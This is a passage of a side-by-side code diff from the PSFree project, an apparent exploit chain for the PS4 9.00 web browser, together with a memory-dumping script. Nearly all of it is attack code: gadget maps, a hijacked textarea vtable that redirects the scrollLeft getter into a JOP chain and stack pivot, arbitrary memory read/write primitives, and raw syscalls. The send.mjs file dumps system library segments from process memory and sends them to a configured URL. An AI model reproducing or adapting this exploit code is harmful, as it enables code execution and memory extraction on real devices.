function init_gadget_map(gadget_map, offset_map, base_addr) { export function init_gadget_map(gadget_map, offset_map, base_addr) {
for (const [insn, offset] of offset_map) { for (const [insn, offset] of offset_map) {
gadget_map.set(insn, base_addr.add(offset)); gadget_map.set(insn, base_addr.add(offset));
} }
@@ -229,11 +251,13 @@ class Chain900Base extends ChainBase {
this.flag = new Uint8Array(8); this.flag = new Uint8Array(8);
this.flag_addr = get_view_vector(this.flag); this.flag_addr = get_view_vector(this.flag);
this.jmp_target = new Uint8Array(0x100); this.jmp_target = new Uint8Array(0x100);
rw.write64(this.jmp_target, 0x1c, this.get_gadget(push_rdx_jmp)); rw.write64(this.jmp_target, 0x1c, this.get_gadget(jop4));
rw.write64(this.jmp_target, 0, this.get_gadget('pop rsp; ret')); rw.write64(this.jmp_target, 0, this.get_gadget(jop5));
// for save/restore // for save/restore
this.is_saved = false; this.is_saved = false;
this.is_stale = false;
this.position = 0;
const jmp_buf_size = 0xc8; const jmp_buf_size = 0xc8;
this.jmp_buf = new Uint8Array(jmp_buf_size); this.jmp_buf = new Uint8Array(jmp_buf_size);
this.jmp_buf_p = get_view_vector(this.jmp_buf); this.jmp_buf_p = get_view_vector(this.jmp_buf);
@@ -270,6 +294,7 @@ class Chain900Base extends ChainBase {
super.clean(); super.clean();
this._clean_branch_ctx(); this._clean_branch_ctx();
this.is_saved = false; this.is_saved = false;
this.is_stale = false;
} }
// Use start_branch() and end_branch() to delimit a ROP chain that will // Use start_branch() and end_branch() to delimit a ROP chain that will
@@ -449,8 +474,6 @@ class Chain900Base extends ChainBase {
this.push_end(); this.push_end();
this.run(); this.run();
this.clean(); this.clean();
return this.return_value;
} }
syscall(...args) { syscall(...args) {
@@ -462,79 +485,78 @@ class Chain900Base extends ChainBase {
this.push_end(); this.push_end();
this.run(); this.run();
this.clean(); this.clean();
}
return this.return_value; push_clear_errno() {
this.push_call(this.get_gadget('__error'));
this.push_gadget('pop rsi; ret');
this.push_value(0);
this.push_gadget('mov dword ptr [rax], esi; ret');
}
push_get_errno() {
this.push_gadget('pop rdi; ret');
this.push_value(this.errno_addr);
this.push_call(this.get_gadget('__error'));
this.push_gadget('mov rax, qword ptr [rax]; ret');
this.push_gadget('mov dword ptr [rdi], eax; ret');
}
check_stale() {
if (this.is_stale) {
throw Error('chain already ran, clean it first');
}
this.is_stale = true;
}
check_is_empty() {
if (this.position === 0) {
throw Error('chain is empty');
}
} }
} }
// helper object for ROP
const rop_ta = document.createElement('textarea');
// Chain for PS4 9.00 // Chain for PS4 9.00
class Chain900 extends Chain900Base { export class Chain900 extends Chain900Base {
constructor() { constructor() {
super(); super();
// sizeof JSC:JSObject, the JSCell + the butterfly field const textarea = document.createElement('textarea');
const js_size = 0x10; this.textarea = textarea;
// sizeof WebCore::JSHTMLTextAreaElement, subclass of JSObject const js_ta = mem.addrof(textarea);
const js_ta_size = 0x20; const webcore_ta = js_ta.readp(0x18);
// start of the array of inline properties (JSValues) this.webcore_ta = webcore_ta;
const offset_js_inline_prop = 0x10; // Only offset 0x1c8 will be used when calling the scrollLeft getter
// Sizes may vary between webkit versions so we just assume a size // native function (our tests don't crash).
// that we think is large enough for all of them.
const vtable_size = 0x1000;
const webcore_ta_size = 0x180;
const ta_clone = {};
this.ta_clone = ta_clone;
const clone_p = mem.addrof(ta_clone);
const ta_p = mem.addrof(rop_ta);
for (let i = js_size; i < js_ta_size; i += 8) {
clone_p.write64(i, ta_p.read64(i));
}
const webcore_ta = ta_p.readp(offset_textarea_impl);
const m_wrapped_clone = new Uint8Array(
make_buffer(webcore_ta, webcore_ta_size)
);
this.m_wrapped_clone = m_wrapped_clone;
// Replicate the vtable as much as possible or else the garbage
// collector will crash. It uses functions from the vtable.
// //
// There is no need to restore the original vtable pointer later since // This implies we don't need to know the exact size of the vtable and
// it points to a copy with only offset 0x1b8 changed. The scrollLeft // try to copy it as much as possible to avoid a crash due to missing
// getter is not used by the GC. // vtable entries.
const vtable_clone = new Uint8Array( //
make_buffer(webcore_ta.readp(0), vtable_size) // So the rest of the vtable are free for our use.
); const vtable = new Uint8Array(0x200);
this.vtable_clone = vtable_clone const old_vtable_p = webcore_ta.readp(0);
this.vtable = vtable;
clone_p.write64( this.old_vtable_p = old_vtable_p;
offset_textarea_impl,
get_view_vector(m_wrapped_clone),
);
rw.write64(m_wrapped_clone, 0, get_view_vector(vtable_clone));
clone_p.write64(0, ta_p.read64(0));
// 0x1b8 is the offset of the scrollLeft getter native function // 0x1b8 is the offset of the scrollLeft getter native function
rw.write64(vtable_clone, 0x1b8, this.get_gadget(jop1)); rw.write64(vtable, 0x1b8, this.get_gadget(ta_jop1));
rw.write64(vtable, 0xb8, this.get_gadget(ta_jop2));
rw.write64(vtable, 0x1c, this.get_gadget(ta_jop3));
// for the JOP chain // for the JOP chain
const rax_ptrs = new Uint8Array(0x100); const rax_ptrs = new Uint8Array(0x100);
const rax_ptrs_p = get_view_vector(rax_ptrs); const rax_ptrs_p = get_view_vector(rax_ptrs);
this.rax_ptrs = rax_ptrs; this.rax_ptrs = rax_ptrs;
rw.write64(rax_ptrs, 0x28, this.get_gadget(jop2)); //rw.write64(rax_ptrs, 8, this.get_gadget(jop2));
rw.write64(rax_ptrs, 0x7d, this.get_gadget(jop3)); rw.write64(rax_ptrs, 0x30, this.get_gadget(jop2));
rw.write64(rax_ptrs, 0x58, this.get_gadget(jop4)); rw.write64(rax_ptrs, 0x58, this.get_gadget(jop3));
rw.write64(rax_ptrs, 0x10, this.get_gadget(jop5)); rw.write64(rax_ptrs, 0x10, this.get_gadget(jop4));
rw.write64(rax_ptrs, 0, this.get_gadget(jop6)); rw.write64(rax_ptrs, 0, this.get_gadget(jop5));
// value to pivot rsp to // value to pivot rsp to
rw.write64(rax_ptrs, 0x18, this.stack_addr); rw.write64(this.rax_ptrs, 0x18, this.stack_addr);
const jop_buffer = new Uint8Array(8); const jop_buffer = new Uint8Array(8);
const jop_buffer_p = get_view_vector(jop_buffer); const jop_buffer_p = get_view_vector(jop_buffer);
@@ -542,7 +564,7 @@ class Chain900 extends Chain900Base {
rw.write64(jop_buffer, 0, rax_ptrs_p); rw.write64(jop_buffer, 0, rax_ptrs_p);
clone_p.write64(offset_js_inline_prop + 8*2, jop_buffer_p); rw.write64(vtable, 8, jop_buffer_p);
} }
run() { run() {
@@ -550,20 +572,25 @@ class Chain900 extends Chain900Base {
this.check_is_empty(); this.check_is_empty();
this.check_is_branching(); this.check_is_branching();
// change vtable
this.webcore_ta.write64(0, get_view_vector(this.vtable));
// jump to JOP chain // jump to JOP chain
this.ta_clone.scrollLeft; this.textarea.scrollLeft;
// restore vtable
this.webcore_ta.write64(0, this.old_vtable_p);
} }
} }
const Chain = Chain900; export const Chain = Chain900;
function init(Chain) { export function init(Chain) {
[libwebkit_base, libkernel_base, libc_base] = get_bases(); [libwebkit_base, libkernel_base, libc_base] = get_bases();
init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base); init_gadget_map(gadgets, webkit_gadget_offsets, libwebkit_base);
init_gadget_map(gadgets, libc_gadget_offsets, libc_base); init_gadget_map(gadgets, libc_gadget_offsets, libc_base);
init_gadget_map(gadgets, libkernel_gadget_offsets, libkernel_base);
init_syscall_array(syscall_array, libkernel_base, 300 * KB); init_syscall_array(syscall_array, libkernel_base, 300 * KB);
debug_log('syscall_array:'); log('syscall_array:');
debug_log(syscall_array); log(syscall_array);
Chain.init_class(gadgets, syscall_array); Chain.init_class(gadgets, syscall_array);
} }
@@ -585,26 +612,26 @@ function test_rop(Chain) {
chain.start_branch(); chain.start_branch();
debug_log(`if chain addr: ${chain.stack_addr.add(chain.position)}`); log(`if chain addr: ${chain.stack_addr.add(chain.position)}`);
chain.push_call(longjmp_addr, jmp_buf_p); chain.push_call(longjmp_addr, jmp_buf_p);
chain.end_branch(); chain.end_branch();
debug_log(`endif chain addr: ${chain.stack_addr.add(chain.position)}`); log(`endif chain addr: ${chain.stack_addr.add(chain.position)}`);
chain.push_end(); chain.push_end();
// The ROP chain is a noop. If we crashed, then we did something wrong. // The ROP chain is a noop. If we crashed, then we did something wrong.
alert('chain run'); alert('chain run');
debug_log('test call setjmp()/longjmp()'); log('test call setjmp()/longjmp()');
chain.run() chain.run()
alert('returned successfully'); alert('returned successfully');
debug_log('returned successfully'); log('returned successfully');
debug_log('jmp_buf:'); log('jmp_buf:');
debug_log(jmp_buf); log(jmp_buf);
debug_log(`flag: ${rw.read64(chain.flag, 0)}`); log(`flag: ${rw.read64(chain.flag, 0)}`);
const state1 = new Uint8Array(8); const state1 = new Uint8Array(8);
debug_log('test if rax == 0'); log('test if rax == 0');
chain.clean(); chain.clean();
chain.push_gadget('pop rsi; ret'); chain.push_gadget('pop rsi; ret');
@@ -630,13 +657,13 @@ function test_rop(Chain) {
chain.push_end(); chain.push_end();
chain.run(); chain.run();
debug_log(`state1 must be 1: ${state1}`); log(`state1 must be 1: ${state1}`);
if (state1[0] !== 1) { if (state1[0] !== 1) {
die('if branch not taken'); die('if branch not taken');
} }
const state2 = new Uint8Array(8); const state2 = new Uint8Array(8);
debug_log('test if rax != 0'); log('test if rax != 0');
chain.clean(); chain.clean();
chain.push_gadget('pop rsi; ret'); chain.push_gadget('pop rsi; ret');
@@ -662,24 +689,25 @@ function test_rop(Chain) {
chain.push_end(); chain.push_end();
chain.run(); chain.run();
debug_log(`state2 must be 2: ${state2}`); log(`state2 must be 2: ${state2}`);
if (state2[0] !== 2) { if (state2[0] !== 2) {
die('if branch taken'); die('if branch taken');
} }
debug_log('test syscall getuid()'); log('test syscall getuid()');
chain.clean(); chain.clean();
// Set the return value to some random value. If the syscall worked, then // Set the return value to some random value. If the syscall worked, then
// it will likely change. // it will likely change.
const magic = 0x4b435546; const magic = 0x4b435546;
rw.write32(chain._return_value, 0, magic); rw.write32(chain._return_value, 0, magic);
const res = chain.syscall('getuid'); chain.syscall('getuid');
debug_log(`return value: ${res}`); log(`return value: ${chain.return_value}`);
if (res.eq(magic)) { if (chain.return_value.low() === magic) {
die('syscall getuid failed'); die('syscall getuid failed');
} }
} }
test_rop(Chain); log('Chain900');
//test_rop(Chain);
scripts/lapse.mjs
+1739
View File
File diff suppressed because it is too large Load Diff
send.mjs
+53 -15
View File
@@ -1,4 +1,4 @@
/* Copyright (C) 2024 anonymous /* Copyright (C) 2024-2025 anonymous
This file is part of PSFree. This file is part of PSFree.
@@ -15,15 +15,55 @@ GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */ along with this program. If not, see <https://www.gnu.org/licenses/>. */
// script for dumping libSceNKWebKit.sprx, libkernel_web.sprx, and
// libSceLibcInternal.sprx
// This script is for firmware 8.0x. You need to port this to your firmware if
// you want to use it. It only dumps the .text and PT_SCE_RELRO segments. It
// doesn't dump the entire ELF file.
//
// There's also some miscellaneous functions to dump functions from WebKit that
// were studied during the development of PSFree.
// libkernel libraries contain syscalls
// syscalls are enforced to be called from these libraries
//
// libkernel_web.sprx is used by the browser in firmwares >= 6.00
// libkernel.sprx for firmwares below
//
// libkernel_sys.sprx contains syscalls that aren't found in the others, such
// as mount and nmount
//
// the BD-J app uses libkernel_sys.sprx for example
// Porting HOWTO:
//
// You can only dump the WebKit module (libSceNKWebKit.sprx for FW >= 6.00,
// else libSceWebkit2.sprx) initially via dump_libwebkit() on any firmware.
// We'll use the WebKit dump to search for imported functions from libkernel
// and LibcInternal. Once we resolve the imports, we can use find_base() to get
// the boundaries of these modules.
//
// Most of the work is done for you at dump_lib*(). You just need to find the
// offset of the imported functions relative to WebKit's base address.
//
// import candidates:
//
// __stack_chk_fail() is a good import from libkernel to search for as it's
// easy to find since most functions are protected by a stack canary.
//
// For a LibcInternal import we searched for strlen() but you can search for
// any libc function such as memcpy().
import * as config from './config.mjs'; import * as config from './config.mjs';
import { Int } from './module/int64.mjs'; import { Int } from './module/int64.mjs';
import { Addr, mem } from './module/mem.mjs'; import { Addr, mem } from './module/mem.mjs';
import { make_buffer, find_base, resolve_import } from './module/memtools.mjs'; import { make_buffer, find_base, resolve_import } from './module/memtools.mjs';
import { KB, MB } from './module/constants.mjs'; import { KB, MB } from './module/offset.mjs';
import { import {
debug_log, log,
align, align,
die, die,
send, send,
@@ -51,9 +91,9 @@ function get_boundaries(leak) {
// dump a module's .text and PT_SCE_RELRO segments only // dump a module's .text and PT_SCE_RELRO segments only
function dump(name, lib_base, lib_end) { function dump(name, lib_base, lib_end) {
// assumed size < 4GB // assumed size < 4GB
const lib_size = lib_end.sub(lib_base).low(); const lib_size = lib_end.sub(lib_base).lo;
debug_log(`${name} base: ${lib_base}`); log(`${name} base: ${lib_base}`);
debug_log(`${name} size: ${lib_size}`); log(`${name} size: ${lib_size}`);
const lib = make_buffer( const lib = make_buffer(
lib_base, lib_base,
lib_size lib_size
@@ -62,7 +102,7 @@ function dump(name, lib_base, lib_end) {
url, url,
lib, lib,
`${name}.sprx.text_${lib_base}.bin`, `${name}.sprx.text_${lib_base}.bin`,
() => debug_log(`${name} sent`) () => log(`${name} sent`)
); );
} }
@@ -76,9 +116,9 @@ function dump_libwebkit() {
// in PT_SCE_RELRO segment (p_type = 0x6100_0010) // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
addr = addr.readp(0); addr = addr.readp(0);
debug_log(`vtable: ${addr}`); log(`vtable: ${addr}`);
const vtable = make_buffer(addr, 0x400); const vtable = make_buffer(addr, 0x400);
send(url, vtable, `vtable_${addr}.bin`, () => debug_log('vtable sent')); send(url, vtable, `vtable_${addr}.bin`, () => log('vtable sent'));
const [lib_base, lib_end] = get_boundaries(addr); const [lib_base, lib_end] = get_boundaries(addr);
dump('libSceNKWebKit', lib_base, lib_end); dump('libSceNKWebKit', lib_base, lib_end);
@@ -94,7 +134,7 @@ function dump_libkernel(libwebkit_base) {
const stack_chk_fail_import = libwebkit_base.add(offset); const stack_chk_fail_import = libwebkit_base.add(offset);
const libkernel_leak = resolve_import(stack_chk_fail_import); const libkernel_leak = resolve_import(stack_chk_fail_import);
debug_log(`__stack_chk_fail import: ${libkernel_leak}`); log(`__stack_chk_fail import: ${libkernel_leak}`);
const [lib_base, lib_end] = get_boundaries(libkernel_leak); const [lib_base, lib_end] = get_boundaries(libkernel_leak);
dump('libkernel_web', lib_base, lib_end); dump('libkernel_web', lib_base, lib_end);
@@ -108,7 +148,7 @@ function dump_libc(libwebkit_base) {
const strlen_import = libwebkit_base.add(offset); const strlen_import = libwebkit_base.add(offset);
const libc_leak = resolve_import(strlen_import); const libc_leak = resolve_import(strlen_import);
debug_log(`strlen import: ${libc_leak}`); log(`strlen import: ${libc_leak}`);
const [lib_base, lib_end] = get_boundaries(libc_leak); const [lib_base, lib_end] = get_boundaries(libc_leak);
dump('libSceLibcInternal', lib_base, lib_end); dump('libSceLibcInternal', lib_base, lib_end);
@@ -158,7 +198,7 @@ function dump_eval() {
url, url,
make_buffer(impl, 0x800), make_buffer(impl, 0x800),
`eval_dump_offset_${offset}.bin`, `eval_dump_offset_${offset}.bin`,
() => debug_log('sent') () => log('sent')
); );
} }
@@ -186,8 +226,6 @@ function dump_scrollLeft() {
url, url,
make_buffer(getter, 0x800), make_buffer(getter, 0x800),
`scrollLeft_getter_dump_offset_${offset}.bin`, `scrollLeft_getter_dump_offset_${offset}.bin`,
() => debug_log('sent') () => log('sent')
); );
} }
dump_scrollLeft();